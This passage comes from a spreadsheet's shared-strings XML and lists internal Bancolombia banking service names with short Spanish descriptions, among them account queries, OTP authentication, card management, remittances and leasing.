El servicio está pensado para mostrarle a los consumidores información relevante sobre los documentos tales como: tipo del documento, subtipo del documento, dueño del documento, fecha de indexación del documento entre otros, adicionalmente permite elegir la opción de visualizar o no un link donde los documentos consultados pueden ser descargados, este servicio devuelve 0 o muchos documentos de acuerdo a los filtros que se realicen sobre este.</t>
  </si>
  <si>
    <t>ConsultaModificacionEndeudamiento</t>
  </si>
  <si>
    <t>El servicio de Consulta Modificaciones Endeudamiento nos brindará la capacidad con su modalidad, tipo y numero de identificación nos diga para que producto se le podrá aplicar modificación, validando así el vector mora, calificación y marca 026</t>
  </si>
  <si>
    <t>ConsultaMovimientoCuentaDeposito</t>
  </si>
  <si>
    <t>El servicio Consulta Movimiento Cuenta Deposito tiene como objetivo realizar las consultas de los movimientos de las cuentas depósitos (Cuenta Ahorro y Cuenta Corriente) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco.</t>
  </si>
  <si>
    <t>ConsultaMovimientoDepositos</t>
  </si>
  <si>
    <t>El servicio tiene como objetivo realizar las consulta de los Movimientos de las cuentas depósitos (Cuenta Ahorro y Corriente) de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco.</t>
  </si>
  <si>
    <t>ConsultaObligacionesFactoring</t>
  </si>
  <si>
    <t>El servicio Consulta Obligaciones Factoring permite a los consumidores obtener el listado de todas las operaciones u obligaciones de Factoring que tenga un cliente, sean de descuento de facturas o línea triangular y con información detallada de cada obligación.</t>
  </si>
  <si>
    <t>ConsultaObligacionesLeasing</t>
  </si>
  <si>
    <t>El servicio Consulta Obligaciones Leasing permite a los consumidores obtener el listado de todas las operaciones u obligaciones de Leasing que tenga un cliente, sean de leasing financiero o arrendamiento operativo y con información detallada de cada obligación.</t>
  </si>
  <si>
    <t>ConsultaPagaresElectronicos</t>
  </si>
  <si>
    <t>El servicio tiene como objetivo realizar todo tipo de consultas de los pagarés sobre las operaciones del Servicio GestionarPagareElectronico para su visualización por parte de los giradores. Permite filtrar los diferentes tipos de consultas dependiendo de los datos a visualizar.</t>
  </si>
  <si>
    <t>ConsultaPrecalculadoCliente</t>
  </si>
  <si>
    <t>El servicio “Consulta Precalculado Cliente” ofrece la capacidad de la información consolidada del cliente a nivel de Central Interna, Central Externa, Listas de Control, Capacidad de Pago y Calificación de Riesgo.</t>
  </si>
  <si>
    <t>ConsultaPrestamosPorCliente</t>
  </si>
  <si>
    <t>El servicio ConsultaPrestamosPorCliente permite obtener información general de préstamos asociados a un cliente a partir de sus datos de identificación.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.8_Productos-BancaSeguros</t>
  </si>
  <si>
    <t>ConsultaProductosClientesPersonas</t>
  </si>
  <si>
    <t xml:space="preserve">El Servicio permite obtener información detallada de la relación del cliente con sus productos y las personas relacionadas a sus productos(relacionados). 
La relación cliente productos devuelve cuales son los productos que un cliente tiene asociado, su porcentaje de participación, la oficina dueña, el tipo de relación que tiene con el producto, etc., agrupado por tipo y número.
Un relacionado es cualquier persona que tenga participación con los productos de un cliente, por ejemplo: un titular, un avalista, un deudor, un cotitular, un beneficiario, etc.
</t>
  </si>
  <si>
    <t>ConsultaProductosInvestBot</t>
  </si>
  <si>
    <t>desde la sucursal virtual, el cliente podrá consultar los giros recibidos en una cuenta específica propia de un producto de cuenta de ahorros ó cuenta corriente</t>
  </si>
  <si>
    <t>ConsultaPuntosColombia</t>
  </si>
  <si>
    <t>Pendiente Por definir.</t>
  </si>
  <si>
    <t>ConsultaRecargas</t>
  </si>
  <si>
    <t>Ofrece a sus consumidores la posibilidad de realizar los diferentes tipos de consultas relacionas con los servicios de recargas en los distintos canales ofrecidos por el banco.</t>
  </si>
  <si>
    <t>ConsultaSaldosConsolidados</t>
  </si>
  <si>
    <t>ConsultaSaldosFondosFiduciarios</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance realizar las consultas de los saldos de los productos de los fondos de la fiducia que tienen saldos pendientes por confirmar de acuerdo al portafolio creado por el cliente inversionista a través de InvesBot.</t>
  </si>
  <si>
    <t>ConsultaSolicitudCreditoSufi</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite realizar diferentes consultas relacionadas con los créditos que se manejan en el contexto funcional de sufi. </t>
  </si>
  <si>
    <t>ConsultaSolicitudCréditoSufi</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.6.1_Externos-Superfinanciera</t>
  </si>
  <si>
    <t>ConsultaTarjetasDeCredito</t>
  </si>
  <si>
    <t>Este servicio permite a los diferentes sistemas de Bancolombia consultar la información de una tarjeta de crédito dada, esta información puede ser básica, extendida o saldos disponibles.</t>
  </si>
  <si>
    <t>ConsultaTarjetasDebito</t>
  </si>
  <si>
    <t>El servicio consulta tarjetas del cliente, traerá todas las tarjetas activas que tiene el cliente (Debito, crédito y virtuales), con las condiciones propias del canal de Billetera Móvil.
Nota:  Este servicio lo expone un servidor de  Canal Billetera y se expone en IIB10</t>
  </si>
  <si>
    <t>ConsultaTasa</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.3.1_ApoyoFin-OperacionesDeTesoreria</t>
  </si>
  <si>
    <t xml:space="preserve">Permite consultar la información de los cheques consignados en la cuenta especificada por el cliente, cuentas pertenecientes a cuenta de ahorros o cuenta corriente pertenecientes a Filiales de Exterior.
</t>
  </si>
  <si>
    <t>ConsultarClientesPrecalculados</t>
  </si>
  <si>
    <t>Permitir consultar los Créditos Hipotecarios con sus movimientos y detalles, tanto para Individuales como para Constructor, por medio de varios canales como son la Sucursal Virtual Personas (SVP, Bancolombia APP, Web Mobile Browser), Telefónica (AUD, GDE) y Canales Físicos (Golf).</t>
  </si>
  <si>
    <t>ConsultarFilialesClientes</t>
  </si>
  <si>
    <t>Realizar la consulta de filiales en las que un cliente tiene productos.</t>
  </si>
  <si>
    <t xml:space="preserve">Mostrar al cliente el detalle del MT. Cada vez que se realiza una transferencia vía SWIFT se genera un archivo denominado Formato MT 103 el cual contiene los datos del giro realizado o del giro recibido. </t>
  </si>
  <si>
    <t>Consultatasapreferencialcliente</t>
  </si>
  <si>
    <t>Este servicio es el encargado de ejecutar primero el servicio de “RecuperarIdCliente_v3.0” perteneciente al HUB Filiales del Exterior para obtener las llaves de Finacle por medio del tipo y número de identificación del cliente y posteriormente con ese dato de respuesta poder consultar la tasa preferencial del cliente en Finacle.</t>
  </si>
  <si>
    <t>ConsumoFacturaElectronica</t>
  </si>
  <si>
    <t>Servicio ConsumoFacturaelectronica</t>
  </si>
  <si>
    <t>ContribucionDocumental</t>
  </si>
  <si>
    <t>Permite realizar checkin de documentos hacia Gestión Documental (UCM), firmado electrónico de documentos PDF (estampado cronológico) y su posterior custodia en Oracle UCM.</t>
  </si>
  <si>
    <t>CreacionCasosBPMDocumental</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio se encargará de hacer el envío de información desde cualquier Front al BPM documental, pasando por bróker, con el detalle de donde viene, con su respectivo ID, el nombre del proceso que se va a enviar, como campos requeridos, y la relación de información de clientes, del proceso y la de documentos; cuando el BPM documental reciba esta información debe devolver una respuesta que indica que llegó. </t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.7.3_Integracion-AutomatizacionProcesos</t>
  </si>
  <si>
    <t>CreacionTarjetasCredito</t>
  </si>
  <si>
    <t>CreaciónEstadoSolicitud</t>
  </si>
  <si>
    <t>El servicio Creación Estado Solicitud es un servicio que permite almacenar la información del estado de una solicitud de un cliente.</t>
  </si>
  <si>
    <t>Deposit-AccountBalance</t>
  </si>
  <si>
    <t>Esta API permite realizar la consulta de los saldos de las cuentas depósito asociados a un cliente Bancolombia.</t>
  </si>
  <si>
    <t>DesbloquearOTP</t>
  </si>
  <si>
    <t>El servicio permite realizar las novedades de desbloqueo para el segundo factor de autenticación con el fin de que el cliente pueda ejecutar transacciones de riesgo.</t>
  </si>
  <si>
    <t>DesenrolarOTP</t>
  </si>
  <si>
    <t>El servicio permite realizar el proceso automático de desactivación del servicio OTP de clientes inactivos (Inactividad superior a 6 meses),  y ex clientes siempre y cuando este se encuentre en estado activo o enrolado en el segundo mecanismo de autenticación de OTP.</t>
  </si>
  <si>
    <t>DigitalizacionTarjetaMdes</t>
  </si>
  <si>
    <t>Este servicio tiene como objetivo permitir la conexión entre el servicio de MDES de MasterCard y Bancolombia para soportar el proceso de digitalización de tarjetas, las cuales serán usadas en las billeteras electrónicas que se les habilite el servicio.</t>
  </si>
  <si>
    <t>DistribucionTarjetaDebito</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permitirá la distribución a los clientes e inventarios de tarjetas débito (plásticos).
Realizar operaciones que comprendan la distribución de estas y el manejo en los inventarios de las mismas, para las sucursales o para los operadores logísticos.
</t>
  </si>
  <si>
    <t>Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID, para poder hacer uso de este es necesario enrolarse o matricularse, para eso se expone este servicio “EnrolarClienteOTP”.   Existen 3 posibles formas de usar este OTP, por Softoken, SMS o email (estos últimos dos son conocidos como ODA), de acuerdo al mecanismo que se desee utilizar es necesario matricularse de forma particular en ese mecanismo y para esto Detect ID expone 3 operaciones diferentes, para nuestro caso la información del cliente estará en el CRM, Intermedia para Valores,  (número celular o email), por lo tanto no se ve la necesidad de utilizar las 3 operaciones, sino solo 2, la de uso de SMS y de email son iguales para nuestro caso, por tanto solo usaremos para ambos mecanismo la de email, la autenticación con Softoken permanecerá tal como viene aunque por el momento no se usará para Valroes. En este documento se muestra el diseño de este servicio (EnrolarClienteOTP) y su operacion (enrolarClienteOTPSoftoken)</t>
  </si>
  <si>
    <t xml:space="preserve">Permite Enrolar los Clientes para el uso de OTP en los diferentes canales transaccionales del Banco la aplicación proveedora es Detect ID. </t>
  </si>
  <si>
    <t>EntregaLlaveCifradoPIN</t>
  </si>
  <si>
    <t>El Servicio contiene la operación requerida para el envío de la llave con la cual se cifra el PIN de los clientes de acuerdo a las necesidades propias de la solución.</t>
  </si>
  <si>
    <t xml:space="preserve">Realizar el envió del código de Seguridad al cliente, a través del componente de alertas.
</t>
  </si>
  <si>
    <t>EnvioAlertasyNotificaciones</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así el cliente no las haya configurado. 
Este servicio invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el iseries.
</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite enviar correos electrónicos </t>
  </si>
  <si>
    <t>El servicio de enviar correo electrónico consta de 4 servicios que le permitirán al consumidor utilizar dependiendo de sus necesidades como un el envío de un correo básico, con adjunto generado por el banco, un adjunto generado por el proveedor masivian y este último adjunto con una contraseña.</t>
  </si>
  <si>
    <t>EnvioSmsRedeban</t>
  </si>
  <si>
    <t>Este servicio permite realizar el envío de SMS a través del proveedor Redeban. Dichos mensajes corresponden principalmente a los generados por Alertas y Notificaciones que se encuentra en Iseries. Dichas alertas son generadas dada la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes.
Su función será recibir la trama plana que entrega Iseries para transformarla y entregar al proveedor la estructura XML para el envío del SMS. Por lo tanto no es reusable para otros proyectos.
El envío se hace uno a uno.</t>
  </si>
  <si>
    <t>ExternSession</t>
  </si>
  <si>
    <t>FundsTransferServiceService</t>
  </si>
  <si>
    <t>GeneracionPIN</t>
  </si>
  <si>
    <t>Servicio que permite crear el PIN (primera clave) a un cliente sin la necesidad de estar en una sucursal física.</t>
  </si>
  <si>
    <t xml:space="preserve"> Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID.
El alcance del servicio GenerarOTP, comprende la especificación del modelo de servicio requerido para el funcionamiento de la capacidad de negocio de Generación y Asignación de tokens a los clientes con el segundo factor de autenticación vía OTP.
El servicio ya existe en su versión 1.1 con la operación generarOTPODA, en esta nueva versión 2 se cambiará la firma para que sea el consumidor quien envíe el sharedkey del cliente y no el servicio quien lo asigne programáticamente.
Adicionalmente se agrega la operación generarEnviarOTPODA que habilitará no solo la generación del OTP sino también su envío a través del componente de alertas y notificaciones del banco, permitiendo así a los consumidores finales no tener que hacer dos llamados independientes para generar y luego enviar el OTP.</t>
  </si>
  <si>
    <t>El servicio Gestión Acta Operación Leasing permite crear o modificar un acta de aprobación de un leasing donde se indican las condiciones como tasa, plazo, etc., con las cuales un cliente tomará un leasing de cualquier tipo de activo.  El acta puede ser de un solo uso o por un cupo.</t>
  </si>
  <si>
    <t>GestionAlertasYNotificaciones</t>
  </si>
  <si>
    <t>El servicio debe proporcionar la información de si un cliente está inscripto en el servicio de alertas y de ser así, debe retornar el número de celular y/o correo registrados en Alertas.</t>
  </si>
  <si>
    <t>GestionAutenticacionOAuth2</t>
  </si>
  <si>
    <t>GestionAutenticacionesVoiceOTP</t>
  </si>
  <si>
    <t>Este servicio permitirá la implementación de las nuevas capacidades requeridas para las aplicaciones que usarán el segundo factor de autenticación a través del mecanismo de Voice OTP.
El servicio expone los métodos necesarios para generar él envió, validación y gestión de los OTP enviados a través de un número telefónico.</t>
  </si>
  <si>
    <t>Este servicio permitirá solicitar el bloqueo de la Clave del cliente.</t>
  </si>
  <si>
    <t>GestionClienteValores</t>
  </si>
  <si>
    <t>GestionClienteViajero</t>
  </si>
  <si>
    <t>El servicio Gestión Cliente Viajero permite agregar, consultar, modificar o eliminar solicitudes de Cliente Viajero. Cuando un cliente va a salir del país, puede notificar al banco la fecha de salida y regreso al país y los países que visitará en dichas fechas, para que los movimientos que realice con sus tarjetas no sean marcados como sospechosos y se evite así posibles bloqueos.</t>
  </si>
  <si>
    <t>GestionCodigoAutorizacion</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.6_Productos-EstablecimientoComercioAdquirencia</t>
  </si>
  <si>
    <t>GestionComerciosIncocredito</t>
  </si>
  <si>
    <t>El servicio Gestión Comercios Redeban permite afiliar un nuevo comercio, así como fidelizar, desfidelizar y registrar una novedad de cambio cuenta con Redeban.</t>
  </si>
  <si>
    <t>GestionComerciosRedeban</t>
  </si>
  <si>
    <t>El servicio Gestión Comercios Redeban permite afiliar un nuevo comercio, así como fidelizar, desfidelizar y registrar una novedad de cambio de cuenta con Redeban.</t>
  </si>
  <si>
    <t>GestionComisionTransferenciasExternas</t>
  </si>
  <si>
    <t>GestionCuentaMultiProducto</t>
  </si>
  <si>
    <t>El servicio GestionCuentaMultiProducto permitirá a los consumidores realizar acciones sobre las cuentas multi producto asociadas a un cliente en específico en valores, tales como debitar, acreditar posteriormente se habilitará la inscripción de cuentas.</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite vincular cuentas activas de ahorro y corrientes del cliente de Bancolombia a Paypal. Adicionalmente consultar  con un traceTransaccion, tipo Documento y numero Documento, si el cliente tiene ya inscripta una cuenta Bancolombia en Paypal, que le permita transferir  dinero desde su cuenta paypal a la cuenta Bancolombia vinculada; y desvincular la cuenta de Bancolombia con la cuenta de Paypal en caso que el cliente no requiera seguir usando dicha cuenta  o cambiarla la vinculación a otra cuenta activa del  Banco; y por ultimo consultar los limites. </t>
  </si>
  <si>
    <t>GestionCuentasACH</t>
  </si>
  <si>
    <t>GestionDatosPersona</t>
  </si>
  <si>
    <t>GestionDatosPersona   ofrece a sus consumidores la posibilidad de consultar la información básica asociada a una identificación, es decir dado un numero y tipo de documento, el servicio responde con nombres apellidos dirección entre otros datos.</t>
  </si>
  <si>
    <t>GestionDeCuentas</t>
  </si>
  <si>
    <t>Servicio que permite crear las cuentas de ahorros para los clientes, teniendo la posibilidad de heredar las características de la cuenta si esta es beneficiaria de un convenio de nómina.</t>
  </si>
  <si>
    <t>GestionDeDocumentos</t>
  </si>
  <si>
    <t>El serviciopermite el almacenamiento y procesamiento de información requerida a los clientes por parte de los productos o procesos del Banco.</t>
  </si>
  <si>
    <t>GestionDeRemesas</t>
  </si>
  <si>
    <t>Las Remesadoras podrán hacer la gestión de giros con el Banco. A través del Servicio Web expuesto por el Banco, las remesadoras podrán consultar personas, realizar órdenes de pago, cancelar órdenes de pago, consultar remesas.</t>
  </si>
  <si>
    <t>GestionDeclaracionPatrimonial</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio gestión declaración patrimonial permite consultar las relaciones declaradas entre varias declarantes a través de sus documentos de identidad y determinar el tipo de relación  existe entre los documentos , ejemplo:
CC declarante principal 1234
CC declarante secundario 456
Tipo de relación: Hermano.
</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.4.4_ApoyoCorporativo-ServiciosAdministrativosYCadenaDeAbastecimiento</t>
  </si>
  <si>
    <t>GestionDesembolsoCreditoPyme</t>
  </si>
  <si>
    <t>GestionDevolucionGiro</t>
  </si>
  <si>
    <t>GestionDevolucionGiro ofrece a sus consumidores la posibilidad de cancelar un giro cuando el beneficiario después de x tiempo no lo ha reclamado, y también de devolver el dinero al girador después de ser cancelado.</t>
  </si>
  <si>
    <t>GestionEnvioGiro</t>
  </si>
  <si>
    <t>GestionEnvioGiro ofrece a sus consumidores la posibilidad de enviar un giro para ser reclamado por el beneficiario por cualquiera de los canales que ofrece el banco.</t>
  </si>
  <si>
    <t>GestionFactoring</t>
  </si>
  <si>
    <t>El servicio Gestión Factoring, tiene como objetivo realizar la administración de los productos de Factoring, verificar si se tiene un contrato Factoring activo.</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio cuenta con una capacidad personalizada para el procesamiento de comprobantes, el cual permite:
El envío de la información de la factura hacia el proveedor tecnológico que es Carvajal.
</t>
  </si>
  <si>
    <t>GestionGarantiasBancoFNG</t>
  </si>
  <si>
    <t>Este servicio permite la Gestión  del tipo de garantía Fondo Nacional de Garantías, tales como Radicar, consultar y modificar.</t>
  </si>
  <si>
    <t>GestionGarantiasFondoNacional</t>
  </si>
  <si>
    <t>El servicio Gestión Fondo Nacional Garantías contiene las capacidades de reservar y registrar una garantía en el Fondo Nacional.</t>
  </si>
  <si>
    <t>GestionGiros</t>
  </si>
  <si>
    <t xml:space="preserve">Es un servicio mediante el cual diferentes redes podrán hacer la gestión de giros con el Banco. Diferentes redes podrán vender giros, pagar giros (recibir), anular las ventas de los giros o reversar los pagos. </t>
  </si>
  <si>
    <t>GestionGravamenMovimientosFinancieros</t>
  </si>
  <si>
    <t>Este servicio permite agregar o eliminar el beneficio de Gravamen a los Movimientos Financieros (GMF) de cuentas de ahorro, corriente o de depósitos.</t>
  </si>
  <si>
    <t>GestionInstruccionDePago</t>
  </si>
  <si>
    <t>El servicio GestionInstruccionDePago permitirá a los consumidores realizar el registro de una instrucción de pago en valores para realizar transferencias de cuentas multi producto a cuentas Bancolombia y Ach.
Las instrucciones de pago se registran en el sistema con un perfil preparador para posteriormente ser aprobadas, el servicio provee la capacidad de registrar, consultar y actualizar las instrucciones de pago.</t>
  </si>
  <si>
    <t>GestionLegalizacionSolicitudInmobiliaria</t>
  </si>
  <si>
    <t>Este servicio permite obtener información del motor BPMN de Bizagi, que es el encargado de gestionar los flujos de trabajo de un proceso. La información será específica para las solicitudes inmobiliarias.</t>
  </si>
  <si>
    <t>GestionLlaveCifrado</t>
  </si>
  <si>
    <t>GestionMonitoreo</t>
  </si>
  <si>
    <t>El servicio Gestión Monitoreo, tiene como objetivo ingresar o retirar cuentas por cobrar, embargos, etc al módulo de monitoreo, quien es el encargado de gestionar y enviar a los productos los débitos de las cuentas por cobrar.</t>
  </si>
  <si>
    <t>GestionNotificacionDebito</t>
  </si>
  <si>
    <t>El servicio Gestión Notificación Débito, tiene como objetivo la administración de las notificaciones que desde el módulo de monitoreo se realizan a los diferentes productos para sus respectivos débitos y su respuesta.</t>
  </si>
  <si>
    <t>GestionNotificacionesPush</t>
  </si>
  <si>
    <t>Este servicio permitirá la implementación de las nuevas capacidades requeridas para las aplicaciones que usarán el segundo factor de autenticaciones Push.
El servicio expone los métodos necesarios para generar notificaciones Push, enviados al dispositivo móvil registrado por un cliente, para aprobar o rechazar Información de la implementación.</t>
  </si>
  <si>
    <t>GestionObligacionesSufi</t>
  </si>
  <si>
    <t>GestionOperacionCambio</t>
  </si>
  <si>
    <t>Servicio permite identificar las operaciones que realiza un cliente PAYPAL en el mercado cambiario, con el fin de obtener la información de las  operaciones de cambio por servicios, transferencias  y canalizarlas en el mercado cambiario</t>
  </si>
  <si>
    <t>GestionPQR</t>
  </si>
  <si>
    <t>El servicio Gestión PQR permite a los consumidores crear, modificar y consultar peticiones quejas y reclamos en el sistema de almacenamiento de pqr´s.</t>
  </si>
  <si>
    <t>GestionPagoGiro</t>
  </si>
  <si>
    <t>GestionPagoGiro ofrece a sus consumidores la posibilidad de entregar el dinero en efectivo a los beneficiarios de un giro.</t>
  </si>
  <si>
    <t>GestionPagoTarjetaCredito</t>
  </si>
  <si>
    <t>El servicio GestionPagoTarjetaCredito proporciona a los consumidores, capacidades para realizar los temas de gestión para el pago de las tarjetas de crédito.</t>
  </si>
  <si>
    <t>GestionPagoTributario</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite ante el distrito la consulta de los documentos tributarios habilitados  y la notificación en línea de los pagos recibidos en RDI. </t>
  </si>
  <si>
    <t>GestionProveedorLeasing</t>
  </si>
  <si>
    <t>El servicio Gestión Proveedor Leasing permite la creación de una persona natural o jurídica para que se convierta en proveedor de Leasing para efectos de poder adquirir un inmueble, local, vehículo o maquinaria y equipos y así poder ofrecer dichos activos en modalidad de Leasing financiero o de arrendamiento operativo.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.1.2_Clientes-GestionRelacionamientoConElCliente</t>
  </si>
  <si>
    <t>GestionServicioRecarga</t>
  </si>
  <si>
    <t>Ofrece a sus consumidores la posibilidad de realizar recargas de los diferentes servicios (telefonía móvil ,entretenimiento, servicios públicos, TV) por los distintos canales ofrecidos por el Banco.</t>
  </si>
  <si>
    <t>GestionSesion</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite realizar la consulta de la última reexpedición de una simcard, por medio del número telefónico asociado a esta.
Servicio configurado temporalmente para los operados Movistar y Claro.
</t>
  </si>
  <si>
    <t>GestionSolicitudCreditoPyme</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite realizar el envío de las diferentes solicitudes, que desde los canales (SVP-APPpyme – SVPyme), un cliente pyme puede autogestionar para todos los procesos de crédito. Inicialmente, se implementará una nueva operación para la distribución de los limites desde la SVP. </t>
  </si>
  <si>
    <t>GestionTarifasAdquirencia</t>
  </si>
  <si>
    <t>El servicio GestionTarifasAdquirencia permitirá a los consumidores consultar las tarifas que soportan el proceso de venta del producto de Adquirencia, expuestas desde la aplicación MarketPlace de FirstData.</t>
  </si>
  <si>
    <t>GestionTarjetasDebito</t>
  </si>
  <si>
    <t>Realizar gestión sobre las tarjetas débito con funcionalidades como cancelar una tarjeta o realizar las consultas de las tarjetas atadas a una determinada cuenta.</t>
  </si>
  <si>
    <t>GestionTarjetasVirtuales</t>
  </si>
  <si>
    <t>Este servicio permitirá solicitar la creación de una tarjeta Virtual Ecard al cliente</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Gestión Transacciones Medios de pago tiene como finalidad poder grabar y consultar la información relacionada con las transacciones realizadas por los clientes en los diferentes servicios de aceptación de medios de pago como botón de transferencias Bancolombia, pago con cédula y otros, con el fin que sirva de insumo para procesos de conciliación y reportería con los comercios. </t>
  </si>
  <si>
    <t>GestionTransaccionesQRBilletera</t>
  </si>
  <si>
    <t>Este servicio permite gestionar con las redes (Redeban y Credibanco) las transacciones de compras con QR que se realicen con la Billetera Móvil Bancolombia. Las funcionalidades incluyen:
•	Autorizar transacción
•	Reversar transacción
•	Anular transacción
•	Reversar anulación de transacción</t>
  </si>
  <si>
    <t>GestionTributariaCuentasAFC</t>
  </si>
  <si>
    <t>Las operaciones en el servicio son relacionadas con la Gestión Tributaria de Cuentas de Ahorro para el Fomento a la Construcción (AFC).</t>
  </si>
  <si>
    <t>GestionUsuariosAFC</t>
  </si>
  <si>
    <t>Es una virtualización de servicios para la gestión de usuarios del sistema AFC.</t>
  </si>
  <si>
    <t>GestionarArchivos</t>
  </si>
  <si>
    <t>GestionarGiros</t>
  </si>
  <si>
    <t>GestionarInversionista</t>
  </si>
  <si>
    <t>GestionarNovedadesDelCDT</t>
  </si>
  <si>
    <t>Este servicio tiene como alcance realizar las novedades relacionadas con el producto de CDT, las cuales implican modificaciones, cancelaciones, adición de cotitulares, pago de intereses, etc.</t>
  </si>
  <si>
    <t>GestionarRemesas</t>
  </si>
  <si>
    <t>Gestionar Remesas</t>
  </si>
  <si>
    <t>GestionarSesion</t>
  </si>
  <si>
    <t>El servicio permite la administración de sesiones de un cliente autenticado contra un canal virtual del banco.</t>
  </si>
  <si>
    <t>GestionarSolicitudCreditoHipotecario</t>
  </si>
  <si>
    <t>El servicio se encargará de hacer la mediación entre el sistema consumidor y el sistema proveedor BIZAGI para permitir la creación de nuevos casos de solicitud de crédito hipotecario.</t>
  </si>
  <si>
    <t>Gestionclientepagonomina</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio GestionClientePagoNomina permite a las pequeñas y grandes empresas, 
realizar su inscripción de cliente (persona natural o jurídica) al servicio de pago de nómina. Lo anterior con el fin de tener el registro de dicho cliente en el sistema de pagos para que posteriormente el cliente pueda realizar el pago de su nómina. Este servicio también permite consultar si el cliente se encuentra registrado en pago de nómina.  
</t>
  </si>
  <si>
    <t>Gestioncontingenciaclavedinamica</t>
  </si>
  <si>
    <t xml:space="preserve">Para los canales que requieran utilizar clave dinámica en el momento que un usuario este transando a través de esta, y a su vez esta falle, se crea este servicio que permite tener una contingencia en caso del fallo. Lo anterior con el fin de que el usuario no pierda la experiencia y pueda continuar con la transacción. 
Para lo anterior, es necesario que esta contingencia sea administrada (activar o desactivar), lo cual se permitirá hacer mediante este servicio y dicha administración estará a cargo de operación digital. 
</t>
  </si>
  <si>
    <t>Gestiondetopesmontosclientes</t>
  </si>
  <si>
    <t>Este servicio permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el día. 
Para esto, el servicio permitirá consultar el monto límite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el día para poder determinar hasta que momento puede debitarse de sus cuentas.</t>
  </si>
  <si>
    <t>Gestiontasapreferencialtransferenciasexternas</t>
  </si>
  <si>
    <t>Este servicio permite obtener la tasa preferencial de un cliente para las transferencias internacionales de filiales del exterior, por medio de la llave Finacle que el cliente posea.</t>
  </si>
  <si>
    <t>GestiónConciliaciónClientes</t>
  </si>
  <si>
    <t>GestiónProductosPreferentesCliente</t>
  </si>
  <si>
    <t>El servicio Gestión Productos Preferentes Cliente permitirá la creación, modificación y consulta, de información preferente de los clientes, como cuentas o en general productos con los cuales desee pagar usando los diferentes servicios de medios de pago ofrecidos dentro de la estrategia de aceptación de pagos como: botón de pagos, pago con cédula, etc.</t>
  </si>
  <si>
    <t>GestiónSolicitudPagos</t>
  </si>
  <si>
    <t>Este servicio permite realizar las diferentes solicitudes de generación, anulación, reverso y confirmación de los pagos solicitados por un cliente de una empresa que tenga convenio con el Banco</t>
  </si>
  <si>
    <t>H340-SUA:ConsultaChequesDeGerenciaPorDesembolso</t>
  </si>
  <si>
    <t>Transacción que permite realizar la contabilización e impresión de un cheque de gerencia, generado por un desembolso de cartera o crédito hipotecario.</t>
  </si>
  <si>
    <t>H341-SUA:ConfirmaciónChequesDeGerenciaPorDesembolso</t>
  </si>
  <si>
    <t>Transacción que permite realizar la impresión de un cheque de gerencia, generado por un desembolso de cartera o crédito hipotecario.</t>
  </si>
  <si>
    <t>H701-SUA:ConsultaCreditoHipotecario</t>
  </si>
  <si>
    <t>La transacción permite realizar la consulta de abono a un crédito hipotecario, en efectivo, canje o nota débito a la cuenta corriente o de ahorros del cliente titular del mismo.</t>
  </si>
  <si>
    <t>H703-SUA:EnvioPagoCreditoHipotecario</t>
  </si>
  <si>
    <t>Transacción que envía la novedad de abono de cartera hipotecaria constructor o individual al aplicativo FINACLE.</t>
  </si>
  <si>
    <t>I703-SUA:ReversoEnvioPagoCreditoHipotecario</t>
  </si>
  <si>
    <t>Transacción que envía la novedad de reverso en abono de cartera hipotecaria constructor o individual al aplicativo FINACLE.</t>
  </si>
  <si>
    <t>InterfaceBackoffice</t>
  </si>
  <si>
    <t>InterfaceBancolombia</t>
  </si>
  <si>
    <t>ListadoCuentasDepositos</t>
  </si>
  <si>
    <t>Las cuentas de ahorro y corrientes son productos financieros de alta demanda por parte de los clientes y en ese sentido es necesario que el banco tenga la capacidad de acceder a la información de estas cuentas. El objetivo de este servicio es agrupar todas las capacidades de consulta de información NO monetaria de los productos de cuentas depósitos.
Este servicio para su uso debe ser validado previamente con el dueño del servicio.</t>
  </si>
  <si>
    <t>ListarProductosDocumentosCliente</t>
  </si>
  <si>
    <t>El servicio ListarProductosDocumentosCliente permitirá a los consumidores listar los productos que pertenecen a un cliente y que son aplicables para la generación de documentos como certificación bancaria, movimientos de la cuenta según lo requiera.</t>
  </si>
  <si>
    <t>MantenimientoCuentasDepositos</t>
  </si>
  <si>
    <t>NotificacionCargueMasivoDeLimites</t>
  </si>
  <si>
